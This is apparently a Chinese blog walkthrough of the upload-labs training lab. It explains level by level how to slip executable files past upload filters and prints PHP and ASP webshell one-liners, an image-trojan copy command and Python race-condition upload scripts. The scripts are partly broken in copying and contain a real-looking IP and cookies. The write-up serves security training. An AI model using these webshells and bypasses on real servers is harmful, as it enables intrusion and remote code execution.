Upload-libs通关详解
Posted -zhong
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Upload-libs通关详解相关的知识,希望对你有一定的参考价值。
Uplo ad-labs—详解
1前端验证绕过
前端验证绕过可以直接用burp万能绕过前端JS脚本
方法先上传一张jpg
Burp改包然后改后缀
上传成功
2Content-Type方式绕过
此绕过方式是将mimi也就是说文件后缀
我们此时选择上传图片抓包
发现content——tpype为image/jpeg
接下来我们上传1.php将content-type改为和图片一样的上传
然后发现上传成功
3黑名单绕过
这一关是另类的文件名的绕过,可以尝试phtml,php3,php4, php5, pht后缀名都可以绕过,但是前提是要在配置文件里面有这样的一句话
AddType application/x-httpd-php .php .phtml .phps .php5 .pht
这是文件源码不能这些是黑名单
当然还有方法二
构造.htaccess
实现重写文件解析,同样这样的前提也是得在配置文件里面有这样的一句话
AllowOverride All
LoadModule rewrite_module modules/mod_rewrite.so
看一下百度对htaccess的理解
概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。
我个人理解的意思就是,把SetHandler application/x-httpd-php 这句话写成.htaccess,然后上传个jpg,它就当php解析了
cmd制作文件方式,先把这句话写到1.txt,然后ren 1.txt .htaccess,然后就制作好了,先上传这个,然后把php改成jpg上传
访问页面发现没有回显,说明解析成功
这里我们需要注意
关键字要和你的图片马一样 比如我hatccess文件里面是tony
我图片马名称就是tony
然后利用hackbar传参来控制,先pwd看一下所在的位置
然后ls到上层寻找
找到文件,cat一下,然后在源代码里面就能看到了
一开始没有回显以为失败了,结果在源码里
那么问题来了
此时菜刀应该连接tony.php 还是tony.jpg呐
答案如图
然后成功
4.htaccess绕过
可以知道方法三的那些php5 ptml都不行了
只能用.htaccess绕过了
此方法在方法3的第二方案讲了
成功上传
5后缀大小写绕过
只有用大小写绕过
但是我觉得这个应该是情况而定吧 你遇到的不一定就是Php就行的
所以多尝试
各种尝试
访问成功
6文件后缀(空)绕过
这里我们不就不能用大小写后缀绕过
加了全部转换为小写
此时大家别像我一样 在win里面给文件加空格后缀 主要是我之前还加了好久 哈哈
直接上传抓包 然后burp改包一键上传就OK
成功上传
7文件后缀名.绕过
大家仔细观察
可以看见和第六题相比此次少了
这个因此我们可以BP抓包加·绕过
This is succeeful
8 ::$DATA(Windows文件流绕过)
查看源码
还是黑名单,但是没有对后缀名进行去”::$DATA”处理,利用windows特性,可在后缀名中加” ::$DATA”绕过:
之前代码都有除去字符串
但是这里没有
成功绕过
9构造文件后缀绕过
str_replace
这个函数大家不陌生吧
可想而知
他先删除一个点
再删除一个空格
大家可以发现
成功绕过了
. .(点加空格加点)
10双写文件后缀绕过
查看源码
$file_name = trim($_FILES[‘upload_file‘][‘name‘]);//定义name
$file_name = str_ireplace($deny_ext,"", $file_name);//替换上面的php这些为空
找出关键代码
好
这个很熟悉了吧
Sql双写绕过
由于php特殊
所以双写也得讲道理所以构造下面
pphphp
OK I am winner
11%00截断绕过。
看源码发现是白名单
但是我们发现ima-path直接拼接 因此可以%00绕过
这个时候可以使用%00截断,但这东西有点过气了,因为需要两个条件
php版本小于5.3.4
php的magic_quotes_gpc为OFF状态
如果要完成这一个题目就必须要实现上面的两个条件,但是现在都PHP7了,这东西也就很少见了,满足上面的条件的时候php就是把它当成结束符,后面的数据直接忽略,这也导致了很多的问题,文件包含也可以利用这一点
所以如果要绕过,我们可以这样去实现,另save_path等于下面的值
但是现在PHP大多数多高于这个版本了
截断时候一定要万分注意%00后面加空格一定要
12%00截断2
这次的save_path是通过post传进来的,还是利用00截断,但这次需要在二进制中进行修改,因为post不会像get对%00进行自动解码。
找到参数后 后面用二进制工具
9.php%00
13图片马
查看源码
发现对文件头进行了处理
并以此判断文件类型
我们可以制作图片马进行上传
注意这里的图片必须是真图片copy下来才能绕过验证
这是我们简单写的一个文件包含
<?php
$file = $_GET[ ‘page‘ ];
include($file);
?>
这样采访才能成功
所以图片木马必须配合文件包含漏洞才能使用
14getimagesize图片类型绕过
查看源码
这里利用了getimagesize
rray getimagesize ( string $filename [, array &$imageinfo ] )
getimagesize() 函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型和一个可以用于普通 HTML 文件中 IMG 标记中的 height/width 文本字
和13一样构造图片马上传 同时需要文件包含漏洞
15关php_exif模块图片类型绕过
查看源码
$image_type = exif_imagetype($filename);
这是新加的函数
和13关一样的绕过方法
16二次渲染绕过
查看源码
抓包看上传后图片的那些部分被截取那些没有被截取 然后在讲代码插入未被截取的部分
然后也是文件包含漏洞
同样需要
17条件竞争绕过
查看源码
$temp_file = $_FILES[‘upload_file‘][‘tmp_name‘];//存储在服务器的文件的临时副本的名称
当我们上传web shell文件时,不会先限制php类型文件上传,先利用上面的语句把上传的文件临时存放。再执行下面的if语句进行文件类型的限制和文件名的时间戳。然后执行if(move_uploaded_file($temp_file, $upload_file))//移动到新文件夹
绕过思路是利用代码执行过程有耗费时间的过程。临时webshell文件保存的极短时间,去访问webshell。获取一些信息
我们可以利用burp多线程发包,然后不断在浏览器访问我们的webshell。会有一瞬间的访问成功
python脚本:
# coding:utf-8
import hackhttp
from multiprocessing.dummy import Pool as ThreadPool
def upload(lists):
hh = hackhttp.hackhttp()
raw = """POST / HTTP/1.1
Host: http://localhost:8088/upload-labs-master/Pass-17/index.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://108.160.142.252:9001/
Content-Type: multipart/form-data; boundary=---------------------------19988116922523
Content-Length: 2196
Cookie: csrftoken=r0XE7UKfalFDMCMqF5fphAprLj2CYhzk; sessionid=gv2xwxra43oe9dj7p5wz8lxjtsz0speg
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------19988116922523
Content-Disposition: form-data; name="upload_file"; filename="damaxiao.php"
Content-Type: application/octet-stream
<?php assert($_POST["a"])?>
-----------------------------19988116922523
Content-Disposition: form-data; name="submit"
ä¸ä¼
-----------------------------19988116922523--
"""
code, head, html, redirect, log = hh.http(‘http://108.160.142.252:9001/‘, raw=raw)
print(str(code) + "\\r")
pool = ThreadPool(20)
pool.map(upload, range(10000))
pool.close()
pool.join()
request模块
import requests
import hackhttp
from multiprocessing.dummy import Pool as ThreadPool
import sys
reload(sys)
sys.setdefaultencoding(‘utf8‘)
url = ‘http://localhost:8088/upload-labs-master/Pass-17/index.php‘
def upload():
file =
‘file‘: open(‘damaxiao.php‘,‘rb‘)
header =
‘Host‘: ‘108.160.142.252:9001‘,
‘User-Agent‘: ‘Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0‘,
‘Accept‘: ‘text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8‘,
‘Accept-Language‘: ‘zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2‘,
‘Accept-Encoding‘: ‘gzip, deflate‘,
‘Cookie‘: ‘csrftoken=r0XE7UKfalFDMCMqF5fphAprLj2CYhzk; sessionid=gv2xwxra43oe9dj7p5wz8lxjtsz0speg; aM3_sid=s98M8S‘,
‘Connection‘: ‘keep-alive‘,
‘Upgrade-Insecure-Requests‘: ‘1‘,
‘Cache-Control‘: ‘max-age=0‘
# def keepreq():
r = requests.post(url,files=file)
print(str(r.status_code) + "\\r")
pool = ThreadPool(20)
pool.map(upload(), range(10000))
pool.close()
pool.join()
https://blog.csdn.net/u011377996/article/details/86776198
我也不是很懂嘛
18条件竞争2()
同17
19(CVE-2015-2348 move_uploaded_file() 00截断)
$img_path = UPLOAD_PATH . ‘/‘ .$file_name;
if (move_uploaded_file($_FILES[‘upload_file‘][‘tmp_name‘], $img_path))
$is_upload = true;
else
$msg = ‘上传失败!‘;
CVE-2015-2348 move_uploaded_file() 00截断,上传webshell,同时自定义保存名称,直接保存为php是不行的
发现move_uploaded_file()函数中的img_path是由post参数save_name控制的,因此可以在save_name利用00截断绕过:
利用方式:
利用成功
后面加一个空格便是绕过了不知道为什么这么神奇
20IIS6.0解析漏洞
我们先查看源码
http://www.php.cn/php-weizijiaocheng-402602.html
这个函数是按
https://www.cnblogs.com/kenshinobiy/p/7782910.html
http://www.w3school.com.cn/php/func_array_in_array.asp
先按.将文件名称分割
在
大概意思就是解析漏洞
成功上传
21IIS文件名解析
学渗透一定要动手操作,一个简单的动作重复N遍以上就能学会了。
最近在学习一句话木马的使用,加上中国菜刀,真是个居家旅行的必备技能。举例说asp的一句话:
<%execute request(chr(97))%>
a就是连接密码了。(一定要写对chr(97),我看着书写char(97)被坑了一下午...还以为是服务器设置问题)。但是今天我练习的时候遇到了只能上传图片的漏洞,然后就去网上找姿势,就学习了IIS6.0的解析漏洞了。
我的练习环境是windows 2003的IIS6.0,这个版本有两个解析漏洞:
1、在网站目录中如果存在名为*.asp、*.asa的目录,那该目录内的任何文件都会被IIS解析为asp文件并执行。
2、在上传图片木马的时候,将文件名改为*.asp;.jpg,该文件文件都会被IIS解析为asp文件并执行。
第一个漏洞测试成功了,在网站目录下创建了一个1.asp目录,在目录下上传了内容为<%execute request(chr(97))%>但文件名为cmd.jpg的”图像“文件,用菜刀成功连接。
第二个漏洞同理,不同的只是之间建立一个同样内容的cmd.asp;.jpg文件。
至于制作asp图片木马,今天学到了一个copy拼接的方法:
准备一张图片(尽可能小点吧,10k左右?对加载应该有影响),命名为1.jpg
写asp一句话木马,命名为1.asp
打开cmd,执行COPY 1.jpg /b + 1.asp /a asp.jpg拼接得到asp.jpg即时asp图片木马了。【/b表示指定一个二进制文件,/a表示指定一个ASCII文件】
22IIS目录解析如上
切记 学习之路 少就是多 慢就是快
以上是关于Upload-libs通关详解的主要内容,如果未能解决你的问题,请参考以下文章
14.VisualVM使用详解15.VisualVM堆查看器使用的内存不足19.class文件--文件结构--魔数20.文件结构--常量池21.文件结构访问标志(2个字节)22.类加载机制概(代码片段